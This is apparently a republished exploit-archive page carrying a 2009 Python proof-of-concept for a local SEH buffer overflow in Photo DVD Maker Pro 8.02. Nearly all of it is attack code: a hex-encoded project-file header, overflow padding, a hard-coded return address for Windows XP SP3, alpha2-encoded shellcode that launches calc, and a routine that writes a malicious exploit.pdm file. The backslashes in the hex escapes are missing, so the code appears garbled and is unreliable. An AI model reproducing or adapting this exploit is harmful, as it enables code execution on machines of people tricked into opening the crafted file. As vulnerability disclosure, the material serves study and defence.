Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)
# Published : 2009-07-10
# Author : His0k4
# Previous Title : Mercury Audio Player 1.21 (.m3u) Local Stack Overflow Exploit
# Next Title : FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit
???# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[+] Bug : Photo DVD Maker (.pdm) Local Buffer Overflow Exploit (SEH)
#[+] Refer : Secunia advisory 35709
#[+] Exploit : His0k4
#[+] Tested on : Windows XP (SP3)

#[+] Description: The program filters some chars i haven't tried to list them...
#		  So i decided directly to use the alpha2 tool

#[+] Note : After generating the project file,convert it to UTF-8 without BOM and save
#[+] Note2 : You have to open the exploit file from the program(file>open)


header1 =  "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20"
header1 += "x65x6ex63x6fx64x69x6ex67x3dx22x55x54x46x2dx38x22x20x3fx3ex0a"
header1 += "x3cx50x68x6fx74x6fx5fx44x56x44x5fx4dx61x6bx65x72x5fx50x72x6f"
header1 += "x6ax65x63x74x20x76x65x72x73x69x6fx6ex3dx22x37x2ex30x30x22x20"
header1 += "x61x6cx62x75x6dx5fx63x6fx75x6ex74x3dx22x31x22x20x74x68x75x6d"
header1 += "x62x6ex61x69x6cx5fx73x69x7ax65x3dx22x38x30x22x20x61x6cx62x75"
header1 += "x6dx5fx66x69x6cx65x5fx74x69x6dx65x5fx73x74x61x6dx70x3dx22x30"
header1 += "x22x20x64x69x73x6bx5fx66x6fx72x6dx61x74x3dx22x30x22x3ex0ax20"
header1 += "x20x20x20x3cx54x65x6dx70x5fx46x69x6cx65x5fx50x61x74x68x3ex43"
header1 += "x3ax5cx44x6fx63x75x6dx65x6ex74x73x20x61x6ex64x20x53x65x74x74"
header1 += "x69x6ex67x73x5cx76x69x63x74x69x6dx5cx4dx79x20x44x6fx63x75x6d"
header1 += "x65x6ex74x73x5cx50x68x6fx74x6fx20x44x56x44x20x4dx61x6bx65x72"
header1 += "x5cx30x39x30x37x30x36x31x31x33x36x32x37x3cx2fx54x65x6dx70x5f"
header1 += "x46x69x6cx65x5fx50x61x74x68x3ex0ax20x20x20x20x3cx44x56x44x5f"
header1 += "x4dx65x6ex75x20x62x6bx5fx6dx75x73x69x63x5fx63x6fx75x6ex74x3d"
header1 += "x22x31x22x20x62x6bx5fx69x6dx61x67x65x5fx63x6fx75x6ex74x3dx22"
header1 += "x30x22x20x65x6ex63x6fx64x65x5fx64x69x72x74x79x3dx22x31x22x3e"
header1 += "x0ax20x20x20x20x20x20x20x20x3cx4dx65x6ex75x5fx54x65x6dx70x6c"
header1 += "x61x74x65x3ex36x34x58x6dx61x73x2ex78x6dx6cx3cx2fx4dx65x6ex75"
header1 += "x5fx54x65x6dx70x6cx61x74x65x3ex0ax20x20x20x20x20x20x20x20x3c"
header1 += "x4dx65x6ex75x5fx54x69x74x6cx65x20x69x6ex69x74x61x6cx69x7ax65"
header1 += "x64x3dx22x30x22x20x66x6fx6ex74x3dx22x43x61x74x61x6ex65x6fx20"
header1 += "x42x54x22x20x63x6fx6cx6fx72x3dx22x30x78x30x30x30x30x66x66x22"
header1 += "x20x73x69x7ax65x3dx22x33x38x22x20x62x6fx6cx64x3dx22x30x22x20"
header1 += "x69x74x61x6cx69x63x3dx22x30x22x20x75x6ex64x65x72x6cx69x6ex65"
header1 += "x3dx22x30x22x20x77x69x64x74x68x3dx22x33x30x31x22x20x68x65x69"
header1 += "x67x68x74x3dx22x34x35x22x20x61x6cx69x67x6ex3dx22x30x22x20x73"
header1 += "x68x61x64x6fx77x3dx22x31x22x20x73x5fx63x6fx6cx6fx72x3dx22x30"
header1 += "x78x30x65x30x61x39x64x22x20x73x5fx73x69x7ax65x3dx22x32x22x20"
header1 += "x78x30x3dx22x36x30x22x20x79x30x3dx22x37x35x22x3ex4dx79x20x50"
header1 += "x68x6fx74x6fx20x41x6cx62x75x6dx3cx2fx4dx65x6ex75x5fx54x69x74"
header1 += "x6cx65x3ex0ax20x20x20x20x20x20x20x20x3cx42x61x63x6bx67x72x6f"
header1 += "x75x6ex64x5fx4dx75x73x69x63x20x69x64x3dx22x30x22x3ex43x3ax5c"
header1 += "x50x72x6fx67x72x61x6dx20x46x69x6cx65x73x5cx50x68x6fx74x6fx20"
header1 += "x44x56x44x20x4dx61x6bx65x72x20x50x72x6fx66x65x73x73x69x6fx6e"
header1 += "x61x6cx5cx6dx75x73x69x63x5cx64x65x66x61x75x6cx74x2ex6dx70x33"
header1 += "x3cx2fx42x61x63x6bx67x72x6fx75x6ex64x5fx4dx75x73x69x63x3ex0a"
header1 += "x20x20x20x20x20x20x20x20x3cx45x6ex63x6fx64x65x5fx49x6ex66x6f"
header1 += "x2fx3ex0ax20x20x20x20x3cx2fx44x56x44x5fx4dx65x6ex75x3ex0ax20"
header1 += "x20x20x20x3cx4fx70x74x69x6fx6ex73x5fx44x61x74x61x20x64x65x6c"
header1 += "x65x74x65x5fx74x65x6dx70x6cx61x74x65x5fx66x69x6cx65x3dx22x31"
header1 += "x22x3ex0ax20x20x20x20x20x20x20x20x3cx4fx70x74x69x6fx6ex73x5f"
header1 += "x44x69x73x6bx4dx65x6ex75x5fx44x61x74x61x20x67x72x61x79x5fx73"
header1 += "x63x61x6cx65x3dx22x30x22x20x76x69x73x69x62x6cx65x5fx6dx65x6e"
header1 += "x75x5fx74x69x74x6cx65x3dx22x31x22x20x76x69x73x69x62x6cx65x5f"
header1 += "x61x6cx62x75x6dx5fx74x69x74x6cx65x3dx22x31x22x20x76x69x73x69"
header1 += "x62x6cx65x5fx61x6cx62x75x6dx5fx69x6ex64x65x78x3dx22x31x22x20"
header1 += "x76x69x73x69x62x6cx65x5fx61x6cx62x75x6dx5fx74x68x75x6dx62x6e"
header1 += "x61x69x6cx3dx22x31x22x20x76x69x73x69x62x6cx65x5fx70x61x67x65"
header1 += "x5fx69x6ex64x65x78x3dx22x31x22x20x62x46x69x78x65x64x44x75x72"
header1 += "x61x74x69x6fx6ex3dx22x31x22x20x64x77x44x56x44x4dx65x6ex75x44"
header1 += "x75x72x61x74x69x6fx6ex3dx22x34x30x22x20x75x73x65x5fx64x76x64"
header1 += "x5fx6dx65x6ex75x3dx22x31x22x20x70x6cx61x79x5fx6dx6fx64x65x3d"
header1 += "x22x32x22x20x70x6cx61x79x5fx73x6cx69x64x65x73x68x6fx77x5fx61"
header1 += "x66x74x65x72x5fx70x6cx61x79x69x6ex67x5fx6dx65x6ex75x3dx22x31"
header1 += "x22x2fx3ex0ax20x20x20x20x20x20x20x20x3cx4fx70x74x69x6fx6ex73"
header1 += "x5fx55x44x46x5fx44x61x74x61x20x6ax6fx6cx69x65x74x3dx22x31x22"
header1 += "x20x73x61x76x65x5fx6fx72x69x67x69x6ex61x6cx5fx66x69x6cx65x73"
header1 += "x3dx22x30x22x20x73x61x76x65x5fx65x78x74x72x61x5fx66x69x6cx65"
header1 += "x73x3dx22x30x22x20x63x6fx70x79x72x69x67x68x74x3dx22x43x6fx70"
header1 += "x79x72x69x67x68x74x28x63x29x20x76x69x63x74x69x6dx22x20x70x75"
header1 += "x62x6cx69x73x68x65x72x3dx22x76x69x63x74x69x6dx22x20x76x6fx6c"
header1 += "x75x6dx65x6cx61x62x65x6cx3dx22x50x68x6fx74x6fx20x41x6cx62x75"
header1 += "x6dx20x6fx66x20x76x69x63x74x69x6dx22x3ex0ax20x20x20x20x20x20"
header1 += "x20x20x20x20x20x20x3cx4fx50x54x5fx45x78x74x72x61x46x69x6cx65"
header1 += "x73x20x66x69x6cx65x73x3dx22x30x22x20x66x6fx6cx64x65x72x3dx22"
header1 += "x22x3ex0ax20x20x20x20x20x20x20x20x20x20x20x20x3cx2fx4fx50x54"
header1 += "x5fx45x78x74x72x61x46x69x6cx65x73x3ex0ax20x20x20x20x20x20x20"
header1 += "x20x3cx2fx4fx70x74x69x6fx6ex73x5fx55x44x46x5fx44x61x74x61x3e"
header1 += "x0ax20x20x20x20x20x20x20x20x3cx4fx70x74x69x6fx6ex73x5fx54x56"
header1 += "x5fx44x61x74x61x20x70x61x6cx3dx22x30x22x20x63x6fx72x72x65x63"
header1 += "x74x69x6fx6ex3dx22x31x22x20x63x72x6fx70x3dx22x35x22x20x63x72"
header1 += "x6fx70x5fx65x6ex61x62x6cx65x3dx22x30x22x20x61x6ex74x69x66x6c"
header1 += "x69x63x6bx3dx22x31x22x20x70x68x6fx74x6fx5fx73x63x61x6cx65x5f"
header1 += "x6dx6fx64x65x3dx22x30x22x2fx3ex0ax20x20x20x20x20x20x20x20x3c"
header1 += "x4fx70x74x69x6fx6ex73x5fx52x65x63x6fx72x64x65x72x5fx44x61x74"
header1 += "x61x20x65x6ex61x62x6cx65x5fx62x75x72x6ex5fx70x72x6fx6fx66x3d"
header1 += "x22x31x22x20x6fx75x74x70x75x74x5fx62x75x72x6ex5fx64x76x64x3d"
header1 += "x22x31x22x20x6fx75x74x70x75x74x5fx64x69x73x63x5fx69x6dx61x67"
header1 += "x65x3dx22x30x22x20x73x68x75x74x64x6fx77x6ex3dx22x30x22x20x69"
header1 += "x73x6fx5fx66x69x6cx65x5fx6ex61x6dx65x3dx22x22x20x63x6fx70x69"
header1 += "x65x73x3dx22x31x22x20x64x72x69x76x65x72x5fx6dx6fx64x65x3dx22"
header1 += "x30x22x20x63x64x5fx77x72x69x74x69x6ex67x5fx6dx6fx64x65x3dx22"
header1 += "x30x22x20x73x69x6dx75x6cx61x74x65x5fx77x72x69x74x69x6ex67x3d"
header1 += "x22x31x22x20x73x70x65x65x64x3dx22x2dx31x22x2fx3ex0ax20x20x20"
header1 += "x20x3cx2fx4fx70x74x69x6fx6ex73x5fx44x61x74x61x3ex0ax20x20x20"
header1 += "x20x3cx41x6cx62x75x6dx5fx44x61x74x61x20x69x64x3dx22x30x22x20"
header1 += "x74x79x70x65x3dx22x73x74x69x6cx6cx69x6dx61x67x65x22x20x6ex61"
header1 += "x6dx65x3dx22x22x20x69x6dx61x67x65x5fx63x6fx75x6ex74x3dx22x31"
header1 += "x22x20x64x75x72x61x74x69x6fx6ex5fx74x5fx6fx6ex65x3dx22x32x22"
header1 += "x20x64x75x72x61x74x69x6fx6ex5fx74x5fx74x77x6fx3dx22x32x22x20"
header1 += "x64x75x72x61x74x69x6fx6ex5fx74x79x70x65x3dx22x30x22x20x62x6b"
header1 += "x5fx63x6fx6cx6fx72x3dx22x30x78x30x30x30x30x30x30x22x20x61x75"
header1 += "x74x6fx5fx70x61x6ex5fx7ax6fx6fx6dx3dx22x31x22x20x6dx75x73x69"
header1 += "x63x5fx66x61x64x65x5fx69x6ex5fx6fx75x74x3dx22x31x22x20x62x6b"
header1 += "x5fx6dx75x73x69x63x5fx63x6fx75x6ex74x3dx22x31x22x20x73x70x72"
header1 += "x69x74x65x5fx63x6fx75x6ex74x3dx22x30x22x20x65x6ex63x6fx64x65"
header1 += "x5fx64x69x72x74x79x3dx22x31x22x20x70x6cx61x79x5fx6fx76x65x72"
header1 += "x5fx63x75x72x72x65x6ex74x5fx73x6fx6ex67x3dx22x30x22x20x74x72"
header1 += "x61x6ex73x69x74x69x6fx6ex5fx63x6fx75x6ex74x3dx22x30x22x20x6e"
header1 += "x6fx6ex65x5fx74x72x61x6ex73x3dx22x30x22x3ex0ax20x20x20x20x20"
header1 += "x20x20x20x3cx41x6cx62x75x6dx5fx54x68x65x6dx65x20x6ex61x6dx65"
header1 += "x3dx22x5fx6ex6fx5fx74x68x65x6dx65x22x2fx3ex0ax20x20x20x20x20"
header1 += "x20x20x20x3cx54x68x65x6dx65x5fx54x69x74x6cx65x20x45x6ex61x62"
header1 += "x6cx65x64x3dx22x30x22x20x73x74x72x69x6ex67x3dx22x22x20x63x6f"
header1 += "x6cx6fx72x3dx22x33x39x34x30x36x22x20x62x6bx5fx63x6fx6cx6fx72"
header1 += "x3dx22x30x22x20x73x69x7ax65x3dx22x34x38x22x20x45x66x66x65x63"
header1 += "x74x3dx22x22x20x64x75x72x61x74x69x6fx6ex3dx22x30x22x2fx3ex0a"
header1 += "x20x20x20x20x20x20x20x20x3cx54x68x65x6dx65x5fx43x72x65x64x69"
header1 += "x74x20x45x6ex61x62x6cx65x64x3dx22x30x22x20x73x74x72x69x6ex67"
header1 += "x3dx22x22x20x63x6fx6cx6fx72x3dx22x33x39x34x30x36x22x20x62x6b"
header1 += "x5fx63x6fx6cx6fx72x3dx22x30x22x20x73x69x7ax65x3dx22x34x38x22"
header1 += "x20x45x66x66x65x63x74x3dx22x22x20x64x75x72x61x74x69x6fx6ex3d"
header1 += "x22x30x22x2fx3ex0ax20x20x20x20x20x20x20x20x3cx45x6ex63x6fx64"
header1 += "x65x5fx46x69x6cx65x2fx3ex0ax20x20x20x20x20x20x20x20x3cx41x6c"
header1 += "x62x75x6dx5fx49x6dx61x67x65x20x69x64x3dx22x30x22x3ex5ax3ax5c"
header1 += "x41x6ex6fx6ex79x6dx6fx75x73x2ex4ax50x47x3cx2fx41x6cx62x75x6d"
header1 += "x5fx49x6dx61x67x65x3ex0ax20x20x20x20x20x20x20x20x3cx42x61x63"
header1 += "x6bx67x72x6fx75x6ex64x5fx4dx75x73x69x63x20x69x64x3dx22x30x22"
header1 += "x20x64x75x72x61x74x69x6fx6ex3dx22x34x30x30x30x30x22x20x73x74"
header1 += "x61x72x74x3dx22x30x22x20x65x6ex64x3dx22x34x30x30x30x30x22x20"
header1 += "x6fx66x66x73x65x74x5fx69x6ex5fx74x72x61x63x6bx3dx22x30x22x3e"
header1 += "x43x3ax5cx50x72x6fx67x72x61x6dx20x46x69x6cx65x73x5cx50x68x6f"
header1 += "x74x6fx20x44x56x44x20x4dx61x6bx65x72x20x50x72x6fx66x65x73x73"
header1 += "x69x6fx6ex61x6cx5cx6dx75x73x69x63x5cx64x65x66x61x75x6cx74x2e"
header1 += "x6dx70x33x3cx2fx42x61x63x6bx67x72x6fx75x6ex64x5fx4dx75x73x69"
header1 += "x63x3ex0ax20x20x20x20x20x20x20x20x3cx4dx65x6ex75x5fx54x65x78"
header1 += "x74x20x69x6ex69x74x61x6cx69x7ax65x64x3dx22x30x22x20x66x6fx6e"
header1 += "x74x3dx22x22x20x63x6fx6cx6fx72x3dx22x30x78x30x30x30x30x30x30"
header1 += "x22x20x73x69x7ax65x3dx22x30x22x20x62x6fx6cx64x3dx22x30x22x20"
header1 += "x69x74x61x6cx69x63x3dx22x30x22x20x75x6ex64x65x72x6cx69x6ex65"
header1 += "x3dx22x30x22x20x77x69x64x74x68x3dx22x30x22x20x68x65x69x67x68"
header1 += "x74x3dx22x30x22x20x61x6cx69x67x6ex3dx22x30x22x20x73x68x61x64"
header1 += "x6fx77x3dx22x30x22x20x73x5fx63x6fx6cx6fx72x3dx22x30x78x30x30"
header1 += "x30x30x30x30x22x20x73x5fx73x69x7ax65x3dx22x30x22x20x78x30x3d"
header1 += "x22x30x22x20x79x30x3dx22x30x22x2fx3ex0ax20x20x20x20x20x20x20"
header1 += "x20x3cx53x75x62x74x69x74x6cx65x5fx46x6fx6ex74x20x66x69x6cx65"
header1 += "x3dx22x43x3ax5cx57x49x4ex44x4fx57x53x5cx46x6fx6ex74x73x5cx61"
header1 += "x72x69x61x6cx2ex74x74x66x22x20x63x68x61x72x73x65x74x3dx22x69"
header1 += "x73x6fx2dx38x38x35x39x2dx31x22x20x73x69x7ax65x3dx22x33x32x22"
header1 += "x2fx3ex0ax20x20x20x20x20x20x20x20x3cx49x6dx61x67x65x5fx44x61"
header1 += "x74x61x20x69x64x3dx22x30x22x20x61x6ex67x6cx65x3dx22x30x22x20"
header1 += "x74x72x61x6ex73x3dx22x42x6fx78x20x57x69x70x65x20x2dx20x54x2e"
header1 += "x20x74x6fx20x4cx2ex5bx54x72x61x6ex73x69x74x69x6fx6ex4cx69x62"
header1 += "x5dx22x3ex0ax20x20x20x20x20x20x20x20x20x20x20x20x3cx46x69x6c"
header1 += "x65x5fx4ex61x6dx65x3ex43x3ax5c"

header2 = "x2ex4ax50x47x3cx2fx46x69x6cx65x5fx4ex61x6dx65x3ex0ax20x20x20"
header2 += "x20x20x20x20x20x3cx2fx49x6dx61x67x65x5fx44x61x74x61x3ex0ax20"
header2 += "x20x20x20x3cx2fx41x6cx62x75x6dx5fx44x61x74x61x3ex0ax3cx2fx50"
header2 += "x68x6fx74x6fx5fx44x56x44x5fx4dx61x6bx65x72x5fx50x72x6fx6ax65"
header2 += "x63x74x3e"

payload =  header1
payload += "x41"*257
#align esp
payload += "x61"*4 #popad
payload += "x56x29xD1x72" # printable p/p/r msacm32.drv (xp/sp3)
payload += "x21"    #making a "Not taken jump"
payload += "x61"*39 #popad
payload += "x4C"*4  #dec esp
payload += "x41"*4  #padding

#win32_exec calc -encoded with alpha2 zero tolerance => 741 bytes
payload += (
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIzK7sciJKd"
"EYxzXIoKOio0OPIRiqY2ig9syRq0ZsfSdQHvVVStp66Rxp4cqFPRbP6pHbhTp"
"QRTs6PpB2cpVRxwBsr2d721XgDra7BQQqTdpw1pDbtqRStrq724p1QStRaqFP"
"Xp4qJ7HSrRdszpOpM0NPO3zpNaVV4QRRpw2P0crTppKG8QUw4pN3spK5hbnqW"
"Suv00J1GrapPpOpNrkfXRoSdPJpQ2kgHPOPUpBpRaQvPPKbnsyWDpKDxSvecp"
"KW8g12p0PrnraaSw2pLRipIPNszaVpXaRPLW6QGqWp0SqpLPL2lrmrpcq4p74"
"RlRkbnrf0O2kTsQVduRfRbW6fPsu5g3uPN0KsxroSusv3bW1bpPKrn1XVVBkV"
"XpNRpbkQDBkQX2opEpNPQ1Qf0PKpNRkcxpNtq0KbxQQtppKbnrirxrnpUW6f2"
"sv0P1Sblg163g2PLQV4vpKsh1RPTQRBs0Eg8srpLPJRwrnPPPKPHsrw4PNFP2"
"kpXW2pWPNRqRmQZ0KRhpJrfrjbp0Krn3ytppKRhPBuhCr0KpBPP1R60srrpBk"
"UhPJQV0N5cPO4uqQp3QXroqR2fQXsuPIQXqZRoSs7H2b0L2k0WQRSuRj6VBbp"
"ORltxcvp0BoSepJqFqZtybppOpLPXRpPP2gruropOw7Bn1SrvraRfpNBvQS0V"
"crpPsjTJA")
payload += header2

try:
    out_file = open("exploit.pdm","w")
    out_file.write(payload)
    out_file.close()
    print("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2009-07-10]